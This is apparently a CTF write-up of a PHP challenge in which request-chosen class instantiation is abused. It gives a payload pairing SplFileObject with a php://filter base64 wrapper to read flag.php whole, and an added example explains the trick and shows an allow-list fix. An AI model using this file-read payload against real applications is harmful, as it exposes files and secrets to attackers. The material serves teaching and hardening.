Challenge link

A simple deserialization challenge. The key question is how to obtain the flag through `echo new $_POST['a']($_POST['b']);`.

```php
<?php
// flag.php (the challenge source)
class teacher{
    public $name;
    public $rank;
    public function __construct($name,$rank){
        $this->name = $name;
        $this->rank = $rank;
    }
}

class classroom{
    public $name;
    public $leader;
    public function __construct($name,$leader){
        $this->name = $name;
        $this->leader = $leader;
    }
}

class school{
    public $department;
    public $headmaster;
    public function __construct($department,$ceo){
        $this->department = $department;
        $this->headmaster = $ceo;
    }
}

// Build the nested object graph and print its serialized, base64-encoded form
$c = new teacher('ing', 'department');
$b = new classroom('one class', $c);
$a = new school($b, 'ong');

print_r(base64_encode(serialize($a)));
```

This relies on the PHP native class SplFileObject, which can read a file's contents, but when echoed it outputs only a single line, so it cannot print the flag on its own.

It has to be combined with a PHP stream wrapper (pseudo-protocol), so that the whole file is collapsed onto one line:

```
a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php
```
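The following is an added example, not code from the original writeup or the challenge. It shows why `echo new SplFileObject($path)` only leaks the first line, why the `php://filter` base64 wrapper turns the entire file into one line, and a hardened replacement for `new $_POST['a']($_POST['b'])` in which request data can never choose the class. The temp file contents, the `teacher` class (redefined here with the same shape as the challenge class) and the `safe_new` helper are all assumptions made for this example.

```php
<?php
// Added example, not part of the original writeup.

// Constructed stand-in for flag.php so the script runs offline.
$path = tempnam(sys_get_temp_dir(), 'demo');
file_put_contents($path, "<?php\n// flag{constructed_demo_value}\n");

// SplFileObject::__toString() returns the current line, i.e. the first
// line of a freshly opened file: here just "<?php".
$plain = new SplFileObject($path);
echo "plain:   ", (string) $plain;

// With convert.base64-encode the stream contains no newlines, so the
// "first line" is the entire encoded file, which is why the payload works.
$filtered = new SplFileObject(
    'php://filter/read=convert.base64-encode/resource=' . $path
);
$encoded = (string) $filtered;
echo "encoded: ", $encoded, "\n";
echo "decoded:\n", base64_decode($encoded);

unlink($path);

// Hardened version of `new $_POST['a']($_POST['b'])`: the class is taken
// from a fixed map, and the request only supplies plain constructor data.
// Same shape as the challenge class, redefined so this file is self-contained.
class teacher {
    public function __construct(public string $name, public string $rank) {}
}

function safe_new(string $type, string $arg): object {
    // Hypothetical allow-list: only these factories are reachable.
    $factories = [
        'teacher' => fn(string $n) => new teacher($n, 'department'),
    ];
    if (!isset($factories[$type])) {
        throw new InvalidArgumentException("type not allowed: $type");
    }
    return $factories[$type]($arg);
}

var_dump(safe_new('teacher', 'ing'));
try {
    // A class name from the request is rejected instead of instantiated.
    safe_new('SplFileObject', 'php://filter/resource=flag.php');
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Run it with `php example.php`: the plain object prints only `<?php`, the filtered one prints a single base64 line that decodes to the whole file, and the hardened factory refuses any type name outside its map.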

For more on PHP native classes, see: https://johnfrod.top/%E5%AE%89%E5%85%A8/ctf-%E4%B8%AD-php%E5%8E%9F%E7%94%9F%E7%B1%BB%E7%9A%84%E5%88%A9%E7%94%A8/
